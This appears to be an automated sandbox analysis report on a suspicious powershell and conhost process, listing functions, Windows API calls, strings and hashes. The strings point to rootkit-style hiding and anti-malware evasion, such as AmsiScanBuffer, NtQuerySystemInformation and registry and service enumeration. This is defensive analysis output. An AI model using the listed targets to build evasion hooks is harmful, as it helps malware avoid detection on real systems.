CreateFileMappingW.KERNELBASE ref: 00007FFD9B80ECB6

Strings

ezB, xrefs: 00007FFD9B80ECFE
ezB, xrefs: 00007FFD9B80EB78

Memory Dump Source

Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd

Similarity

API ID: CreateFileMapping
String ID: ezB$ezB
API String ID: 524692379-3585179095
Opcode ID: 30f9177070feaa388080fe4cc9221e133351fd84c0acfe54e8007286a598c883
Instruction ID: e08367b57babaa37fd1e006ee6f43fe53ae7c1957f5dd4e190c5db76dcfbba4c
Opcode Fuzzy Hash: 30f9177070feaa388080fe4cc9221e133351fd84c0acfe54e8007286a598c883
Instruction Fuzzy Hash: CD71183061CA8C4FDB59DF28C8557E57BE1FF59311F1442AEE88DC7292CA75A8418782

Function 00007FFD9B80E8BC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 227
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 00007FFD9B80EA49

Strings

ezB, xrefs: 00007FFD9B80EA91
ezB, xrefs: 00007FFD9B80E908

Memory Dump Source

Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd

Similarity

API ID: CreateFile
String ID: ezB$ezB
API String ID: 823142352-3585179095
Opcode ID: e70fdf78c0b1568743a708f0e6c59b43ae18d144e5108236ecebc009c1ffd14b
Instruction ID: df5e9ed85fcdc87d2a07913aa2caa7609e5d78b5f8a1e7b893d01874c50e9455
Opcode Fuzzy Hash: e70fdf78c0b1568743a708f0e6c59b43ae18d144e5108236ecebc009c1ffd14b
Instruction Fuzzy Hash: 3761DA30A1CB8D4FDB68EF28D8557E577D0FF59311F14426AE88DC7292CA74E9418B82

Function 00007FFD9B8D0000 Relevance: 4.0, Strings: 1, Instructions: 2707COMMON

Download Yara Rule

Strings

`, xrefs: 00007FFD9B8D0012

Memory Dump Source

Source File: 00000023.00000002.2724378585.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8d0000_powershell.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 00eef2e43de043c7ec030d84aa55a3d1a998b8dafc30dfda0bbdeae9adc03065
Instruction ID: 137cdcf16c8d55fed67597f6194c1e4bde959139a72936a52745a162479d9ccc
Opcode Fuzzy Hash: 00eef2e43de043c7ec030d84aa55a3d1a998b8dafc30dfda0bbdeae9adc03065
Instruction Fuzzy Hash: C6134971E1DB890FEB759F6C98965A877E0EFAD700F0606AFD44887197DA20BC01C786

Function 00007FFD9B8D00DD Relevance: 2.2, Instructions: 2241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2724378585.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dd5b2790a376673fe1d52596bee4dc61b7a4bcc104322a19d3cf157b57453c7
Instruction ID: a6508c5dfc106aa3162746f017109fa42015d8efb8568d60fa9699d662a26a4d
Opcode Fuzzy Hash: 8dd5b2790a376673fe1d52596bee4dc61b7a4bcc104322a19d3cf157b57453c7
Instruction Fuzzy Hash: 09F23AB1E1CB854FEB349F6C54969A977D0EFAC700F0606AED44887297DA20FD01CB86

Function 00007FFD9B80ED76 Relevance: 1.6, APIs: 1, Instructions: 134
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapViewOfFile.KERNELBASE ref: 00007FFD9B80EE53

Memory Dump Source

Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 5f998d266ffa447938ddd279f175edce932f9e947402fa8f508d4b5ae87d5e97
Instruction ID: afa5f689ec964cbd84256273ed2df5f248f6c815a8e5c649bb9a11ff330e1d9e
Opcode Fuzzy Hash: 5f998d266ffa447938ddd279f175edce932f9e947402fa8f508d4b5ae87d5e97
Instruction Fuzzy Hash: 6841293190CA889FD71DDB68D806AE97BF0FF5A321F14026ED089D31A2CB757446CB91

Function 00007FFD9B80E7B8 Relevance: 1.6, APIs: 1, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

K32GetModuleInformation.KERNEL32 ref: 00007FFD9B80E872

Memory Dump Source

Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 4234e65c2744f926a5b41982156fd53e2c25d2483fe0ed854df867e591b44fb4
Instruction ID: 26ae9347f59f8cb2ce1cc03fdbba7ce61cb28bd09a0165bfdd3927eb122e2eab
Opcode Fuzzy Hash: 4234e65c2744f926a5b41982156fd53e2c25d2483fe0ed854df867e591b44fb4
Instruction Fuzzy Hash: 7C310831D0CA4C4FDB1CDB9898496F97BE1EF69321F04426FD059D3692CB746846CB91

Analysis Process: conhost.exePID: 7196, Parent PID: 5948COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1404
Total number of Limit Nodes:	2

Executed Functions

Function 000001FD186D1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000001FD186D1E7F

Part of subcall function 000001FD186D22A8: GetModuleHandleA.KERNEL32(?,?,?,000001FD186D1EB1), ref: 000001FD186D22C0
Part of subcall function 000001FD186D22A8: GetProcAddress.KERNEL32(?,?,?,000001FD186D1EB1), ref: 000001FD186D22D1

CreateThread.KERNELBASE ref: 000001FD186D2043
TlsAlloc.KERNEL32 ref: 000001FD186D2049
TlsAlloc.KERNEL32 ref: 000001FD186D2055
TlsAlloc.KERNEL32 ref: 000001FD186D2061
TlsAlloc.KERNEL32 ref: 000001FD186D206D
TlsAlloc.KERNEL32 ref: 000001FD186D2079
TlsAlloc.KERNEL32 ref: 000001FD186D2085

Strings

EnumServicesStatusExW, xrefs: 000001FD186D1F71, 000001FD186D1F92
NtEnumerateKey, xrefs: 000001FD186D1F19
PdhGetFormattedCounterArrayW, xrefs: 000001FD186D1FF1
pdh.dll, xrefs: 000001FD186D1FD7, 000001FD186D1FF8
NtDeviceIoControlFile, xrefs: 000001FD186D1FB6
NtQueryDirectoryFileEx, xrefs: 000001FD186D1EFC
sechost.dll, xrefs: 000001FD186D1F99
amsi.dll, xrefs: 000001FD186D2019
NtEnumerateValueKey, xrefs: 000001FD186D1F36
advapi32.dll, xrefs: 000001FD186D1F57, 000001FD186D1F78
NtQueryDirectoryFile, xrefs: 000001FD186D1EDF
EnumServiceGroupW, xrefs: 000001FD186D1F50
AmsiScanBuffer, xrefs: 000001FD186D2012
PdhGetRawCounterArrayW, xrefs: 000001FD186D1FD0
ntdll.dll, xrefs: 000001FD186D1E8D
NtResumeThread, xrefs: 000001FD186D1EC2
NtQuerySystemInformation, xrefs: 000001FD186D1EA5

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 3ab70cc3ed0f98afb6f0d0d67f3a2cbc6d0311e7cd00ef3a9efbac45d000c760
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 65518D70168A4BE5EB01DFA4FC67BF42723B741794F800633E49906269EE7CD25AC384

Function 000001FD186D1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000001FD186D1E47
GetProcAddress.KERNEL32 ref: 000001FD186D1E57
SleepEx.KERNELBASE ref: 000001FD186D1E67

Strings

AmsiScanBuffer, xrefs: 000001FD186D1E50
amsi.dll, xrefs: 000001FD186D1E40

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 2c0d1f4a97177b2f81bdabad3089f78c45ecae046d3e13fced304012e3105e4e
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 51D067306A9B06D5EB08EB15F85A3F46263BB64F01FC4053AE51A022A4EE6C89598340

Function 000001FD186D3A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000001FD186D3A35
PathFindFileNameW.SHLWAPI ref: 000001FD186D3A44

Part of subcall function 000001FD186D3F88: StrCmpNIW.SHLWAPI(?,?,?,000001FD186D272F), ref: 000001FD186D3FA0

Part of subcall function 000001FD186D3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001FD186D3A5B), ref: 000001FD186D3EDB
Part of subcall function 000001FD186D3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001FD186D3A5B), ref: 000001FD186D3F0E
Part of subcall function 000001FD186D3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001FD186D3A5B), ref: 000001FD186D3F2E
Part of subcall function 000001FD186D3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001FD186D3A5B), ref: 000001FD186D3F47
Part of subcall function 000001FD186D3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001FD186D3A5B), ref: 000001FD186D3F68

CreateThread.KERNELBASE ref: 000001FD186D3A8B

Part of subcall function 000001FD186D1E74: GetCurrentThread.KERNEL32 ref: 000001FD186D1E7F
Part of subcall function 000001FD186D1E74: CreateThread.KERNELBASE ref: 000001FD186D2043
Part of subcall function 000001FD186D1E74: TlsAlloc.KERNEL32 ref: 000001FD186D2049
Part of subcall function 000001FD186D1E74: TlsAlloc.KERNEL32 ref: 000001FD186D2055
Part of subcall function 000001FD186D1E74: TlsAlloc.KERNEL32 ref: 000001FD186D2061
Part of subcall function 000001FD186D1E74: TlsAlloc.KERNEL32 ref: 000001FD186D206D
Part of subcall function 000001FD186D1E74: TlsAlloc.KERNEL32 ref: 000001FD186D2079
Part of subcall function 000001FD186D1E74: TlsAlloc.KERNEL32 ref: 000001FD186D2085

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: dc76cae71a1b2a600690e53107dbd3ef260399359f937562b423fade14777d86
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: 6A112931718A0382FB60DB21FA5B7F96293A755345F94423AF486821D1FF7DC5448710

Function 000001FD17762EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 000001FD1776302E

Memory Dump Source

Source File: 00000024.00000003.2618275587.000001FD17760000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FD17760000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_3_1fd17760000_conhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 8049ee8bfc845017516d99e05b1eaab730a84b2355e2a0350985086645a5ca79
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 5B9117B2B0565287FB548F25E400BBD7393FB54B98F5A8534AF490779CDA34D81AC710

Function 000001FD186D1BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001FD186D1724: GetProcessHeap.KERNEL32 ref: 000001FD186D172F
Part of subcall function 000001FD186D1724: HeapAlloc.KERNEL32 ref: 000001FD186D173E
Part of subcall function 000001FD186D1724: RegOpenKeyExW.ADVAPI32 ref: 000001FD186D17AE
Part of subcall function 000001FD186D1724: RegOpenKeyExW.ADVAPI32 ref: 000001FD186D17DB
Part of subcall function 000001FD186D1724: RegCloseKey.ADVAPI32 ref: 000001FD186D17F5
Part of subcall function 000001FD186D1724: RegOpenKeyExW.ADVAPI32 ref: 000001FD186D1815
Part of subcall function 000001FD186D1724: RegCloseKey.ADVAPI32 ref: 000001FD186D1830
Part of subcall function 000001FD186D1724: RegOpenKeyExW.ADVAPI32 ref: 000001FD186D1850
Part of subcall function 000001FD186D1724: RegCloseKey.ADVAPI32 ref: 000001FD186D186B
Part of subcall function 000001FD186D1724: RegOpenKeyExW.ADVAPI32 ref: 000001FD186D188B
Part of subcall function 000001FD186D1724: RegCloseKey.ADVAPI32 ref: 000001FD186D18A6
Part of subcall function 000001FD186D1724: RegOpenKeyExW.ADVAPI32 ref: 000001FD186D18C6

SleepEx.KERNELBASE ref: 000001FD186D1BDF

Part of subcall function 000001FD186D1724: RegCloseKey.ADVAPI32 ref: 000001FD186D18E1
Part of subcall function 000001FD186D1724: RegOpenKeyExW.ADVAPI32 ref: 000001FD186D1901
Part of subcall function 000001FD186D1724: RegCloseKey.ADVAPI32 ref: 000001FD186D191C
Part of subcall function 000001FD186D1724: RegOpenKeyExW.ADVAPI32 ref: 000001FD186D193C
Part of subcall function 000001FD186D1724: RegCloseKey.ADVAPI32 ref: 000001FD186D1957
Part of subcall function 000001FD186D1724: RegOpenKeyExW.ADVAPI32 ref: 000001FD186D1977
Part of subcall function 000001FD186D1724: RegCloseKey.ADVAPI32 ref: 000001FD186D1992
Part of subcall function 000001FD186D1724: RegCloseKey.ADVAPI32 ref: 000001FD186D199C

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: 14029be746f34c79a25dc5b310a924c28a860089d37abfbc173fe94b4d2a0025
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: 8331FF75208E43C1FB51DB27F5633F9A3A6AB44BC4F045631EE8987696DFA8C8518218

Non-executed Functions

Function 000001FD186D2FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000001FD186D3094
lstrlenW.KERNEL32 ref: 000001FD186D32BE

Part of subcall function 000001FD186D1A30: OpenProcess.KERNEL32 ref: 000001FD186D1A56
Part of subcall function 000001FD186D1A30: K32GetModuleFileNameExW.KERNEL32 ref: 000001FD186D1A74
Part of subcall function 000001FD186D1A30: PathFindFileNameW.SHLWAPI ref: 000001FD186D1A83
Part of subcall function 000001FD186D1A30: lstrlenW.KERNEL32 ref: 000001FD186D1A8F
Part of subcall function 000001FD186D1A30: StrCpyW.SHLWAPI ref: 000001FD186D1AA2
Part of subcall function 000001FD186D1A30: CloseHandle.KERNEL32 ref: 000001FD186D1AB0

GetProcAddress.KERNEL32 ref: 000001FD186D30A9

Part of subcall function 000001FD186D3F88: StrCmpNIW.SHLWAPI(?,?,?,000001FD186D272F), ref: 000001FD186D3FA0

StrCmpNIW.SHLWAPI ref: 000001FD186D30EC
lstrlenW.KERNEL32 ref: 000001FD186D3214

Strings

NtQueryObject, xrefs: 000001FD186D309F
ntdll.dll, xrefs: 000001FD186D308D
\Device\Nsi, xrefs: 000001FD186D30DF

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: cc6e2e2e15b06062f4a64839b6d398d266d4f5e1479dee90d303672ba5026404
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 1DB17272618A92C2EB65CF25EA427F9A3A6F744B84F44513AFE8993794EF35CD40C340

Function 000001FD186D84B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001FD186D84CC
RtlCaptureContext.NTDLL ref: 000001FD186D84F9
RtlLookupFunctionEntry.NTDLL ref: 000001FD186D8513
RtlVirtualUnwind.NTDLL ref: 000001FD186D8554
IsDebuggerPresent.KERNEL32 ref: 000001FD186D85A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000001FD186D85C5
UnhandledExceptionFilter.KERNEL32 ref: 000001FD186D85D0

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 881dc891a631f31a30cb2754b219b3a6eed23e56a74c3a5b89656694351ab33e
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 67311972209B818AEB60CF60F8857FE7365F784748F44452AEA4E47B99EF78C648C710

Function 000001FD186DCD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001FD186DCE0B
RtlLookupFunctionEntry.NTDLL ref: 000001FD186DCE23
RtlVirtualUnwind.NTDLL ref: 000001FD186DCE5E
IsDebuggerPresent.KERNEL32 ref: 000001FD186DCE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000001FD186DCEA1
UnhandledExceptionFilter.KERNEL32 ref: 000001FD186DCEAC

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: c48cd9ed9c1a29073b9291b38c582e778ac41096372f7dadae3a213965ce2fbe
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: F8413936218B8186EB60CB25F8463FE73A5F788758F500625EA9D47B99EF38C555CB00

Function 000001FD186DDA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000001FD186DDB99
FindNextFileW.KERNEL32 ref: 000001FD186DDCCF
FindClose.KERNEL32 ref: 000001FD186DDD0F
FindClose.KERNEL32 ref: 000001FD186DDD3B

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: b17bca77d18002a47f6d22b5c89c05dfadeb35c11e09e261ce113dd731e9bc8b
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: ECA1D63270C6824AFB20EB75F8467FD6BA6E751798F144235FED927A99DA38C442C700

Function 000001FD186D1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001FD186D172F
HeapAlloc.KERNEL32 ref: 000001FD186D173E

Part of subcall function 000001FD186D1264: GetProcessHeap.KERNEL32 ref: 000001FD186D126A
Part of subcall function 000001FD186D1264: HeapAlloc.KERNEL32 ref: 000001FD186D1279
Part of subcall function 000001FD186D1264: GetProcessHeap.KERNEL32 ref: 000001FD186D1293
Part of subcall function 000001FD186D1264: HeapAlloc.KERNEL32 ref: 000001FD186D12A4

Part of subcall function 000001FD186D1000: GetProcessHeap.KERNEL32 ref: 000001FD186D1006
Part of subcall function 000001FD186D1000: HeapAlloc.KERNEL32 ref: 000001FD186D1015
Part of subcall function 000001FD186D1000: GetProcessHeap.KERNEL32 ref: 000001FD186D1028
Part of subcall function 000001FD186D1000: HeapAlloc.KERNEL32 ref: 000001FD186D1037

RegOpenKeyExW.ADVAPI32 ref: 000001FD186D17AE
RegOpenKeyExW.ADVAPI32 ref: 000001FD186D17DB
RegCloseKey.ADVAPI32 ref: 000001FD186D17F5
RegOpenKeyExW.ADVAPI32 ref: 000001FD186D1815
RegCloseKey.ADVAPI32 ref: 000001FD186D1830
RegOpenKeyExW.ADVAPI32 ref: 000001FD186D1850
RegCloseKey.ADVAPI32 ref: 000001FD186D186B
RegOpenKeyExW.ADVAPI32 ref: 000001FD186D188B
RegCloseKey.ADVAPI32 ref: 000001FD186D18A6
RegOpenKeyExW.ADVAPI32 ref: 000001FD186D18C6
RegCloseKey.ADVAPI32 ref: 000001FD186D18E1
RegOpenKeyExW.ADVAPI32 ref: 000001FD186D1901
RegCloseKey.ADVAPI32 ref: 000001FD186D191C
RegOpenKeyExW.ADVAPI32 ref: 000001FD186D193C
RegCloseKey.ADVAPI32 ref: 000001FD186D1957
RegOpenKeyExW.ADVAPI32 ref: 000001FD186D1977
RegCloseKey.ADVAPI32 ref: 000001FD186D1992
RegCloseKey.ADVAPI32 ref: 000001FD186D199C

Part of subcall function 000001FD186D12B8: RegQueryInfoKeyW.ADVAPI32 ref: 000001FD186D1315
Part of subcall function 000001FD186D12B8: GetProcessHeap.KERNEL32 ref: 000001FD186D1323
Part of subcall function 000001FD186D12B8: HeapAlloc.KERNEL32 ref: 000001FD186D1334
Part of subcall function 000001FD186D12B8: RegEnumValueW.ADVAPI32 ref: 000001FD186D1393
Part of subcall function 000001FD186D12B8: GetProcessHeap.KERNEL32 ref: 000001FD186D13DB
